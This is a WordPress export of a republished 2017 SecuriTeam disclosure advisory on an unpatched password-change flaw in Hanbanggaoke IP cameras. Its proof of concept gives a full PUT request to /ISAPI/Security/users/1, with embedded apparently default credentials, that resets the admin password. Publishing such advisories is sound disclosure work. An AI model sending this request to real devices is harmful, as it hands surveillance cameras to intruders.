{"id":9219,"date":"2017-09-11T14:19:06","date_gmt":"2017-09-11T22:19:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/11\/news-2992\/"},"modified":"2017-09-11T14:19:06","modified_gmt":"2017-09-11T22:19:06","slug":"news-2992","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/09\/11\/news-2992\/","title":{"rendered":"SSD Advisory \u2013 Hanbanggaoke IP Camera Arbitrary Password Change"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 11 Sep 2017 13:49:23 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3420\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3420');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability summary<\/strong><br \/> The following advisory describes an arbitrary password change vulnerability found in Hanbanggaoke webcams. <\/p>\n<p>Beijing Hanbang Technology, &#8220;one of the first enterprises entering into digital video surveillance industry, has been focusing on R&#038;D of products and technology of digital video surveillance field. While providing product and technical support, it also provides overall solution for the industrial system; it has successfully provided system implementation and service supports for several industries.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Netfairy, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> We tried to contact Hanbanggaoke since the 8th of August 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for this vulnerability.<\/p>\n<p><span id=\"more-3420\"><\/span><br \/> <strong>Vulnerability details<\/strong><br \/> User controlled input is not sufficiently sanitized, by sending a PUT request to <em>\/ISAPI\/Security\/users\/1 HTTP\/1.1<\/em> an attacker can change the admin password.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> In order to exploit the vulnerability, we need to use proxy tool (like Burp). We then connect to the victim&#8217;s machine and need to capture the data package.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-1.jpg\" data-slb-active=\"1\" data-slb-asset=\"90925526\" data-slb-internal=\"0\" data-slb-group=\"3420\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-1-300x161.jpg\" alt=\"\" width=\"300\" height=\"161\" class=\"alignnone size-medium wp-image-3429\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-1-300x161.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-1.jpg 554w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-2.jpg\" data-slb-active=\"1\" data-slb-asset=\"137160226\" data-slb-internal=\"0\" data-slb-group=\"3420\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-2-300x134.jpg\" alt=\"\" width=\"300\" height=\"134\" class=\"alignnone size-medium wp-image-3428\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-2-300x134.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-2.jpg 554w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>We then edit the data of the following PUT request:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59b70bda04416263819893\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> PUT \/ISAPI\/Security\/users\/1 HTTP\/1.1  Host: x.x.x.x  Content-Length: 321  Cache-Control: max-age=0  Origin: http:\/\/x.x.x.x  X-Requested-With: XMLHttpRequest  Authorization: Basic YWRtaW46ODg4ODg4  Content-Type: application\/x-www-form-urlencoded  Accept: application\/xml, text\/xml, *\/*; q=0.01  User-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/59.0.3071.115 Safari\/537.36  If-Modified-Since: 0  Referer: http:\/\/116.95.94.10\/doc\/page\/paramconfig.asp  Accept-Encoding: gzip, deflate  Accept-Language: zh-CN,zh;q=0.8  Cookie: updateTips=true; streamType=0; BufferLever=1; userInfo80=YWRtaW46ODg4ODg4; DevID=5; language=zh; curpage=paramconfig.asp%254  Connection: close    &lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;UTF-8&#8243;?&gt;&lt;User&gt;&lt;id&gt;1&lt;\/id&gt;&lt;userName&gt;admin&lt;\/userName&gt;&lt;password&gt;admin&lt;\/password&gt;&lt;bondIpList&gt;&lt;bondIp&gt;&lt;id&gt;1&lt;\/id&gt;&lt;ipAddress&gt;0.0.0.0&lt;\/ipAddress&gt;&lt;ipv6Address&gt;::&lt;\/ipv6Address&gt;&lt;\/bondIp&gt;&lt;\/bondIpList&gt;&lt;macAddress\/&gt;&lt;userLevel&gt;administrator&lt;\/userLevel&gt;&lt;attribute&gt;&lt;inherent&gt;true&lt;\/inherent&gt;&lt;\/attribute&gt;&lt;\/User&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0065 seconds] -->  <\/p>\n<p>The successful response will be:<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-3.jpg\" data-slb-active=\"1\" data-slb-asset=\"714565657\" data-slb-internal=\"0\" data-slb-group=\"3420\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-3-300x74.jpg\" alt=\"\" width=\"300\" height=\"74\" class=\"alignnone size-medium wp-image-3427\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-3-300x74.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-3.jpg 554w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Now, we can login with as administrator:<\/p>\n<ul>\n<li>User: admin<\/li>\n<li>Password: admin<\/li>\n<\/ul>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-4.jpg\" data-slb-active=\"1\" data-slb-asset=\"1725668635\" data-slb-internal=\"0\" data-slb-group=\"3420\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-4-300x145.jpg\" alt=\"\" width=\"300\" height=\"145\" class=\"alignnone size-medium wp-image-3426\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-4-300x145.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-4.jpg 554w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3420\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/09\/Beijing-Hanbang-Technology-1-300x161.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 11 Sep 2017 13:49:23 +0000<\/strong><\/p>\n<p>Vulnerability summary The following advisory describes an arbitrary password change vulnerability found in Hanbanggaoke webcams. Beijing Hanbang Technology, &#8220;one of the first enterprises entering into digital video surveillance industry, has been focusing on R&#038;D of products and technology of digital video surveillance field. While providing product and technical support, it also provides overall solution for &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3420\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Hanbanggaoke IP Camera Arbitrary Password Change<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757,12136],"class_list":["post-9219","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9219","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9219"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9219\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9219"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9219"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9219"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}